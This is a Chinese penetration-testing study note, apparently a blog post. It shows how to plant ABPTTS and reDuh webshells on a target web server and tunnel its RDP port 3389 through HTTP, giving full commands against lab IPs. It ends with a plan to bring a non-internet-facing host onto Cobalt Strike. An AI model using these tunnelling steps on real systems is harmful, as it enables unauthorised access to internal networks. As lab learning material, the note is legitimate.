8月19日笔记

http隧道搭建(续)

ABPTTS安装使用

一款基于 SSL 加密的 HTTP 端口转发工具,全程通信数据加密,比 reGerog 都要稳定。使用 python2 编写,但是该工具只支持 aspx 和 jsp 脚本的网站。

下载地址:https://github.com/nccgroup/ABPTTS

下载依赖:pip2 install pycrypto httplib2

使用教程

复制代码
python2 abpttsfactory.py -o webshell

执行上面的命令会在ABPTTS目录下生成webshell目录

将对应脚本语言的文件上传到目标 web 目录下,访问如下。

这样就上传成功了。接下来输入以下指令(linux/mac):

复制代码
python2 abpttsclient.py -c webshell/config.txt -u http://192.168.5.138/abptts.jsp -f 127.0.0.1:3389/192.168.5.138:3389 --unsafetls

进行端口转发。会将目标机器的 3389 端口映射到本地的 3389 端口。

如果是windows版本的:

复制代码
python2 abpttsclient.py -c webshell\config.txt -u http://10.211.55.3:8080/shiro/abptts.jsp -f 127.0.0.1:3389/10.211.55.3:3389 --unsafetls

输入以下命令查看我们攻击机的端口有没有开放(kali):

复制代码
nc -zv localhost 3389

已经成功开放了。

现在只要用ssh和RDP到本地的3389端口就可以连接到目标主机的3389端口了。

reDuh

reDuh 是一款将 TCP 流量封装在 HTTP 流量中的工具。

下载地址:https://github.com/sensepost/reDuh

下载下来后打开servers的文件夹。

将对应脚本语言的文件上传到目标 web 目录下,访问如下。

进入reDuh/reDuhClient/dist的目录下,然后在本地执行如下命令

复制代码
java -jar reDuhClient.jar http://192.168.5.138/reDuh.jsp

根据返回的内容提示我们监听本地的1010端口。

重新开一个窗口,使用 nc 监听本地的 1010 端口,然后执行如下命令,将目标主机的 3389 端口映射到本地的 33389 端口。

复制代码
nc -vv localhost 1010
[createTunnel]33389:127.0.0.1:3389

然后连接本地的 33389 端口即可连接到目标内网的 3389 了。

不出网上线CS

我们打下了一个目标机器 192.168.5.138,但是该机器不出网,我们现在想让其上线CS。我们的思路是这样的,通过配置代理,让本地虚拟机 192.168.5.128 可以访问到目标机器。然后让本地虚拟机上线 cs,走 bind_tcp 去连接目标机器。(环境问题,明天继续整)

相关推荐
Lv117700812 分钟前
Visual Studio 中的密封类和静态类
ide·笔记·c#·visual studio
Bruce_Liuxiaowei1 小时前
全面TCP端口扫描:Nmap高级扫描技术与实战应用
网络·tcp/ip·网络安全·php
sailing-data2 小时前
【SE 网络】无线物联网络如何选
网络
skyyx20022 小时前
写给网工新手:子网掩码基本概念和一些计算方法
运维·网络
JY.yuyu2 小时前
OSPF路由协议
网络
kiiila2 小时前
【网络】网络通信模型
网络
2501_915918412 小时前
TCP 抓包分析在复杂网络问题中的作用,从连接和数据流层面理解系统异常行为
网络·网络协议·tcp/ip·ios·小程序·uni-app·iphone
EniacCheng3 小时前
【RUST】学习笔记-整型
笔记·学习·rust
断剑zou天涯3 小时前
【算法笔记】树状数组IndexTree
java·笔记·算法
北岛寒沫3 小时前
北京大学国家发展研究院 经济学辅修 经济学原理课程笔记(第九课 公共产品与公共资源)
经验分享·笔记